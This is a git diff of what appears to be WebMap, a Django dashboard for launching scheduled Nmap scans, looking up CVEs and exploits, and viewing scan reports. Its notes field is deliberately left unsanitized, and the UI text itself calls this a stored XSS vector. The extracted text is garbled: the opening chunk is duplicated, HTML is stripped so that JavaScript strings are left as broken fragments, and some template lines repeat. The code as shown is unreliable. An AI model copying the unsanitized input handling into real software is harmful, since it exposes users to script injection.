'+\ + ' '+\ diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..dda43ad --- /dev/null +++ b/requirements.txt @@ -0,0 +1,3 @@ +requests +xmltodict +python-nmap diff --git a/static/async.js b/static/async.js index 14fb5b5..ca07cc8 100644 --- a/static/async.js +++ b/static/async.js @@ -1,12 +1,183 @@ +var active_scan_timer; $(document).ready(function() { // doc ready + + active_scan_timer = setInterval(function() { checkActiveScan(); }, 2000); + $('select').formSelect(); }); +function checkActiveScan() { + $.get('/api/v1/nmap/scan/active').done(function(d) { + console.log(d); + $('#activescan').html(''); + var c = 0; + for(i in d['scans']) { + c = (c + 1); + if(d['scans'][i]['status'] == 'active') { + $('#activescancard').css('display','block'); + $('#activescan').append( + '
'+\ + ' '+\ diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..dda43ad --- /dev/null +++ b/requirements.txt @@ -0,0 +1,3 @@ +requests +xmltodict +python-nmap diff --git a/static/async.js b/static/async.js index 14fb5b5..ca07cc8 100644 --- a/static/async.js +++ b/static/async.js @@ -1,12 +1,183 @@ +var active_scan_timer; $(document).ready(function() { // doc ready + + active_scan_timer = setInterval(function() { checkActiveScan(); }, 2000); + $('select').formSelect(); }); +function checkActiveScan() { + $.get('/api/v1/nmap/scan/active').done(function(d) { + console.log(d); + $('#activescan').html(''); + var c = 0; + for(i in d['scans']) { + c = (c + 1); + if(d['scans'][i]['status'] == 'active') { + $('#activescancard').css('display','block'); + $('#activescan').append( + '
'+
+ ''+
+ ''+
+ '
'
+ );
+ } else {
+ $('#activescancard').css('display','block');
+ $('#activescan').append(
+ ''+c+'
Filename:
'+i+'
'+
+ ''+i+'
Start at: '+d['scans'][i]['startstr']+'
Type: '+d['scans'][i]['type']+', Protocol: '+d['scans'][i]['protocol']+'
'+
+ 'Type: '+d['scans'][i]['type']+', Protocol: '+d['scans'][i]['protocol']+'
'+
+ '
'
+ );
+
+ setTimeout(function() { location.reload(); }, 5000);
+ }
+ }
+
+ if(c <= 0) {
+ $('#activescancard').css('display','none');
+ }
+ });
+}
+
+function newscan() {
+ $('#modaltitle').html('wifi_tethering New Nmap Scan');
+ $('#modalbody').html(
+ 'Run a new Nmap scan by setting the following 3 parameters:'+
+ 'Filename:
'+i+'
'+
+ ''+i+'
Start at: '+d['scans'][i]['startstr']+'
Type: '+d['scans'][i]['type']+', Protocol: '+d['scans'][i]['protocol']+'
'+
+ 'Type: '+d['scans'][i]['type']+', Protocol: '+d['scans'][i]['protocol']+'
'+d['scans'][i]['summary']+'
'+
+ ''+
+ ''+
+ '
'+
+ '
'+ @@ -56,13 +227,13 @@ function openNotes(hashstr, notesb64) { } else { savednotes = '' } - $('#modal1').css('background-color','#3e3e3e'); + // $('#modal1').css('background-color','#3e3e3e'); $('#modaltitle').html('Save Notes'); $('#modalbody').html( 'In the text area below, you can insert notes that will appear on the PDF report. '+ 'All input here are intentionally not sanitized, so you can use HTML markup and JavaScript. '+ 'Please, keep in mind that you can break the PDF View HTML and, of course, this represents a stored XSS vector.
'+ - ''+ + ''+ '
'+ 'Tips:
'+ '
'+ @@ -70,7 +241,7 @@ function openNotes(hashstr, notesb64) { '
'+ 'none none
');
$('#modalbody').append('
Raw Output:
WebMap
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+/', views.port, name='port'),
path('service//', views.index, name='service'),
path('portid//', views.index, name='portid'),
+ path('api/v1/scan//', api.apiv1_hostdetails, name='apiv1_hostdetails'),
+ path('api/v1/scan/', api.apiv1_hostdetails, name='apiv1_hostdetails'),
+ path('api/v1/scan', api.apiv1_scan, name='apiv1_scan'),
+ path('api/v1/nmap/scan/active', functions_nmap.nmap_scaninfo, name='apiv1_scan_active'),
+ path('api/v1/nmap/scan/new', functions_nmap.nmap_newscan, name='apiv1_scan_new'),
+ path('api/v1/nmap/ndiff//', ndiff.ndiff, name='ndiff'),
path('api/setlabel//
'+
+ ' Filename:
Name of the Nmap XML file. This name must has the
Allowed chars:
'+ + ' Target:
This could be the target IP address or hostname
'+ + ' Parameters:
Nmap parameters, more information at https://nmap.org/book/man-briefoptions.html'+ + '
'+ + ' '+ + ' '+ + ' '+ + '
'+ + '
'+
+ ''
+ );
+ $('#modalfooter').html('');
+ $('#modal1').modal('open');
+ $('select').formSelect();
+}
+
+function startscan() {
+ $('#modal1').modal('close');
+ csrftoken = $('input[name="csrfmiddlewaretoken"]').val();
+ $.post('/api/v1/nmap/scan/new', {
+ 'csrfmiddlewaretoken': csrftoken,
+ 'filename': $('#xmlfilename').val(),
+ 'target': $('#targethost').val(),
+ 'params': $('#params').val(),
+ 'schedule': $('#schedule').prop('checked'),
+ 'frequency': $('#frequency').val(),
+ }).done(function(d) {
+ console.log(d);
+ });
+}
+
+var cpetot = 0;
+var cpetimer;
+function checkCVE() {
+ if($('#cpestring').length <= 0) {
+ M.toast({html: 'Please, select a scan report first'});
+ return 0;
+ }
+
+ cpe = JSON.parse(atob(decodeURIComponent($('#cpestring').val())));
+ csrftoken = $('input[name="csrfmiddlewaretoken"]').val();
+ console.log(cpe);
+
+ $('#modaltitle').html('Looking for CVE and Exploits');
+ $('#modalbody').html(
+ 'This process could take a while, please wait...'+
+ 'Name of the Nmap XML file. This name must has the
.xml extension.Allowed chars:
[a-zA-Z0-9], _, - and .'+ + ' Target:
This could be the target IP address or hostname
'+ + ' Parameters:
Nmap parameters, more information at https://nmap.org/book/man-briefoptions.html'+ + '
'+
+ '
'+
+ ''+ + ' '+ + ' '+ + ' '+ + '
'+ + '
'+
+ '
'+
+ ' '+
+ '
'+
+ 'Schedule:
Frequency:
'+
+ ' '
+ );
+ $('#modalfooter').html('');
+ $('#modal1').modal('open');
+
+ $.post('/report/api/getcve/', {
+ 'cpe': $('#cpestring').val(),
+ 'csrfmiddlewaretoken': csrftoken
+ }).done(function(d) {
+ console.log(d);
+ $('#modalbody').html('Done. Please, reload this page by clicking on Reload button.');
+ $('#modalfooter').html('');
+ });
+
+ return 0;
+
+ cpetot = Object.keys(cpe).length;
+ console.log(cpetot);
+
+ for(host in cpe) {
+ for(port in cpe[host]) {
+ for(cpestr in cpe[host][port]) {
+ if(/^cpe:.+:.+:.+:.*$/.test(cpestr)) {
+ console.log(cpestr);
+ $.post('/report/api/getcve/', {
+ 'cpe': cpestr,
+ 'host':host,
+ 'port':port,
+ 'csrfmiddlewaretoken': csrftoken
+ }).done(function(d) {
+ console.log(d);
+ for(rhost in d) {
+ for(rport in d[rhost]) {
+ $('#modalbody').append('
Received: '+d[rhost][rport]['id']+' host:'+rhost+' port:'+rport+'
');
+ }
+ }
+ }).always(function() { cpetot = (cpetot - 1); });
+ } else {
+ cpetot = (cpetot - 1);
+ }
+
+ console.log(cpetot);
+ }
+ }
+ }
+
+ cpetimer = setInterval(function() {
+ if(checkCPETOT()) {
+ console.log('END');
+ window.clearInterval(cpetimer);
+ $('#modalbody').html('Done. Please, reload this page by clicking on Reload button.');
+ $('#modalfooter').html('');
+ }
+ }, 2000);
+}
+
+function checkCPETOT() {
+ if(cpetot <= 0) {
+ return true;
+ } else {
+ return false;
+ }
+}
+
function genPDF(md5scan) {
if(/^[a-f0-9]{32,32}$/.test(md5scan)) {
$.get('/report/api/pdf/').done(function(data) {
console.log(data);
- $('#modal1').css('background-color','#3e3e3e');
+ // $('#modal1').css('background-color','#3e3e3e');
$('#modaltitle').html('Generating PDF Report');
$('#modalbody').html('Please wait a few seconds...'+ @@ -56,13 +227,13 @@ function openNotes(hashstr, notesb64) { } else { savednotes = '' } - $('#modal1').css('background-color','#3e3e3e'); + // $('#modal1').css('background-color','#3e3e3e'); $('#modaltitle').html('Save Notes'); $('#modalbody').html( 'In the text area below, you can insert notes that will appear on the PDF report. '+ 'All input here are intentionally not sanitized, so you can use HTML markup and JavaScript. '+ 'Please, keep in mind that you can break the PDF View HTML and, of course, this represents a stored XSS vector.
'+ - ''+ + ''+ '
'+ 'Tips:
'+ '
<b>bold text</b> = bold text'+ @@ -70,7 +241,7 @@ function openNotes(hashstr, notesb64) { '
<span class="label green">A green label</span> = A green label'+ '
<code>monospace font</code> = monospace font'
);
- $('#modalfooter').html('');
+ $('#modalfooter').html(' ');
$('#modal1').modal('open');
}
}
@@ -79,7 +250,7 @@ function apiPortDetails(address, portid) {
$.get('/report/api/'+address+'/'+portid+'/').done(function(data) {
console.log(data);
- $('#modaltitle').html('Port Details: '+$('').text(data['@portid']).html()+' / '+$('').text(data['@protocol']).html()+'');
+ $('#modaltitle').html('Port Details: '+$('').text(data['@protocol']).html().toUpperCase()+' / '+$('').text(data['@portid']).html()+'');
tbody = ''
ingorescriptid = {
@@ -102,7 +273,7 @@ function apiPortDetails(address, portid) {
tbody += '| Script ID | Output | '+tbody+'
|---|
Raw Output:
'+$('').text(JSON.stringify(data, null, 4)).html()+'');
@@ -115,6 +286,7 @@ function removeLabel(type, hashstr, i) {
if(data['ok'] == 'label removed') {
$('#hostlabel'+i).attr("class","")
$('#hostlabel'+i).html("");
+ $('#hostlabelbb'+i).attr("class","")
}
});
}
@@ -125,17 +297,34 @@ function setLabel(type, label, hashstr, i) {
var res = data;
var color = 'grey'; var margin = '10px';
if(res['ok'] == 'label set') {
+
switch(res['label']) {
case 'Vulnerable': color = 'red'; margin = '10px'; break;
case 'Critical': color = 'black'; margin = '22px'; break;
case 'Warning': color = 'orange'; margin = '28px'; break;
case 'Checked': color = 'blue'; margin = '28px'; break;
}
- $('#hostlabel'+i).css("margin-left", margin)
+
+ // z-index:99;transform: rotate(-8deg);margin-top:-14px;margin-left:-40px;
+ $('#hostlabel'+i).css("margin-left", '-40px')
+ $('#hostlabel'+i).css("z-index", '99')
+ $('#hostlabel'+i).css("transform", 'rotate(-8deg)')
+ $('#hostlabel'+i).css("margin-top", '-14px')
$('#hostlabel'+i).attr("class","")
- $('#hostlabel'+i).addClass('rightlabel');
+ $('#hostlabel'+i).addClass('leftlabel');
$('#hostlabel'+i).addClass(color);
$('#hostlabel'+i).html(res['label']);
+
+ // border-radius:0px 4px 0px 4px;z-index:98;position:absolute;width:18px;height:10px;margin-left:-48px;margin-top:-3px;
+ $('#hostlabelbb'+i).css("border-radius", '0px 4px 0px 4px')
+ $('#hostlabelbb'+i).css("z-index", '98')
+ $('#hostlabelbb'+i).css("position", 'absolute')
+ $('#hostlabelbb'+i).css("width", '18px')
+ $('#hostlabelbb'+i).css("height", '10px')
+ $('#hostlabelbb'+i).css("margin-left", '-54px')
+ $('#hostlabelbb'+i).css("margin-top", '-3px')
+ $('#hostlabelbb'+i).attr("class","")
+ $('#hostlabelbb'+i).addClass(color);
}
});
}
diff --git a/static/custom.css b/static/custom.css
index 769b692..4f23798 100644
--- a/static/custom.css
+++ b/static/custom.css
@@ -80,3 +80,4 @@ body {
font-size:12px;
color:#fff;
}
+
diff --git a/static/report.css b/static/report.css
index cd486b4..c57cdc3 100644
--- a/static/report.css
+++ b/static/report.css
@@ -36,6 +36,8 @@ h1 {
padding:10px;
margin-bottom:10px;
font-family:monospace;
+ border-radius:4px;
+ background-color:#eee;
}
.extratitle {
diff --git a/static/rev3rse_logo.png b/static/rev3rse_logo.png
new file mode 100644
index 0000000..794cf49
Binary files /dev/null and b/static/rev3rse_logo.png differ
diff --git a/templates/nmapreport/index.html b/templates/nmapreport/index.html
deleted file mode 100644
index 09cd576..0000000
--- a/templates/nmapreport/index.html
+++ /dev/null
@@ -1,100 +0,0 @@
-{% load static %}
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- {{ topcontainer|safe }}
-
-
-
-
-
-
-
-
-
-
diff --git a/templates/nmapreport/main.html b/templates/nmapreport/main.html
new file mode 100644
index 0000000..7ed429f
--- /dev/null
+++ b/templates/nmapreport/main.html
@@ -0,0 +1,166 @@
+{% load static %}
+
+
+
+
-
-
-
-
- {{ scaninfo|safe }}
-
-
- Scan Detailsclose
- {{ scandetails|safe }}
-
- {{ pretable|safe }}
-
-
-
-
-
- {{ table|safe }}
-
-
-
-
-
- {{ trhead|safe }}
-
-
- {{ trhost|safe }}
-
-
-
-
- {{ out|safe }}
-
- -
+
- ++
+
+
+ - track_changesShow all Nmap scan +
- settings_input_antennaShow scan details + +
- +
- Support WebMap on GitHub +
- Follow @Rev3rseSecurity +
- Star WebMap +
- Fork WebMap +
+
+
+
+
+
+
+
+
+{% endblock %}
diff --git a/templates/nmapreport/nmap_ndiff.html b/templates/nmapreport/nmap_ndiff.html
new file mode 100644
index 0000000..be69594
--- /dev/null
+++ b/templates/nmapreport/nmap_ndiff.html
@@ -0,0 +1,35 @@
+{% extends "nmapreport/main.html" %}
+
+{% block content %}
+ this section is under development
+
+
+
+
+
+
+
+
+
+
+ Start Time: {{ stats.startstr }}
+ Scan Type: {{ stats.scantype }}
+ Scan Protocol: {{ stats.protocol }}
+ Nmap Command: details
+
+
+
+ + Scan Type: {{ stats.scantype }}
+ Scan Protocol: {{ stats.protocol }}
+ Nmap Command: details
+
+ Scan Detailsclose
+
+
+
+
+ {{ stats.nmapargs }}
+
+ Nmap version: {{ stats.nmapver }}
+ XML version: {{ stats.xmlver }}
+
+
+
+
+
+
+
+
+
+ {{ js|safe }}
+
+ {% for i,v in tr.items %}
+ {{ stats.hostsup }}
HOSTS UP{{ stats.popen }}
OPEN PORTS{{ stats.pclosed }}
CLOSED PORTS{{ stats.pfiltered }}
FILTERED PORTS
+
+
+
+ {% endfor %}
+
+
+
+
+
+
+
+ {{ v.hostindex }}
+ {{ v.newlabelout|safe }}
+ {{ i }}
{{ v.hostname|safe }} + + {{ v.po }} + {{ v.pc }} + {{ v.pf }} + +
+ OPEN PORTS %
+ {{ v.portstate|safe }}
+
+ {% if v.tags|length > 0 %}
+
GUESSED TAGS
+ {% for i in v.tags %} + #{{ i }} + {% endfor %} + {% endif %} +
+ GUESSED TAGS
+ {% for i in v.tags %} + #{{ i }} + {% endfor %} + {% endif %} +
+ SERVICES
+ {{ v.services|safe }} +
+ + {{ v.services|safe }} +
+ PORTS
+ {{ v.ports|safe }} +
+ + {{ v.ports|safe }} +
+
+ -
+
- Vulnerable +
- Critical +
- Warning +
- Checked +
- Remove label + +
- Insert notes + {{ v.removenotes|safe }} +
+
+
+
+
+ {{ js|safe }}
+
+{% endblock %}
diff --git a/templates/nmapreport/nmap_network.html b/templates/nmapreport/nmap_network.html
new file mode 100644
index 0000000..05c3552
--- /dev/null
+++ b/templates/nmapreport/nmap_network.html
@@ -0,0 +1,92 @@
+{% extends "nmapreport/main.html" %}
+
+{% block content %}
+
+
+
+
+ Hosts
+
+
+
+
+
+
+
+
+
+ {{ js|safe }}
+
+{% endblock %}
diff --git a/templates/nmapreport/nmap_portdetails.html b/templates/nmapreport/nmap_portdetails.html
new file mode 100644
index 0000000..50b95d1
--- /dev/null
+++ b/templates/nmapreport/nmap_portdetails.html
@@ -0,0 +1,94 @@
+{% extends "nmapreport/main.html" %}
+
+{% block content %}
+
+
+
+
+ {{ js|safe }}
+{% endblock %}
diff --git a/templates/nmapreport/nmap_xmlfiles.html b/templates/nmapreport/nmap_xmlfiles.html
new file mode 100644
index 0000000..cf09cad
--- /dev/null
+++ b/templates/nmapreport/nmap_xmlfiles.html
@@ -0,0 +1,86 @@
+{% extends "nmapreport/main.html" %}
+
+{% block content %}
+
+
+
+
+
+ {{ label }}
+
+
+
+
+
+
+
+
+
+
+ {% if notes %}
+
+
+
+
+
+ | Port | |
|---|---|
|
+ {% if v.state == 'filtered' %}
+
+ {% elif v.state == 'closed' %}
+
+ {% elif v.state == 'open' %}
+
+ {% endif %}
+ {{ v.protocol }} / {{ v.portid }} +
+ Service: {{ v.service }}
+ + State: {{ v.state }} + Reason: {{ v.reason }} + |
+
+
+ + arrow_drop_down + | +
+
+ {% endif %}
+
+ {% if cvelist %}
+
+ Notes:
+ {{ notes|safe }}
+
+
+
+ {% endif %}
+
+
+ CVE List:
+ {{ cvelist|safe }}
+
+
+
+
+{% endblock %}
diff --git a/urls.py b/urls.py
index e2e3626..1ac7b6c 100644
--- a/urls.py
+++ b/urls.py
@@ -1,5 +1,5 @@
from django.urls import path
-from . import views, api, pdf
+from . import views, api, pdf, network, functions_nmap, ndiff
urlpatterns = [
path('', views.index, name='index'),
@@ -8,11 +8,20 @@
path('port/
+
+
+
+
+
+
+
+ {{ stats.xmlcount }}
+
+ XML Files
+
+
+
+
+
+ {{ stats.po }}
+
+ Open ports
+
+
+
+
+
+ {{ stats.pc }}
+
+ Closed ports
+
+
+
+
+
+ {{ stats.pf }}
+
+ Filtered ports
+
+
+
+
+
+
+
+
+
+
+ | Filename | + + +Stats | ++ |
|---|---|---|
| {{ v.filename|safe }} | + + ++ {{ v.portstats.po }} + {{ v.portstats.pc }} + {{ v.portstats.pf }} + | +view | +
+
+ {{ webmapver|safe }}
+
+
+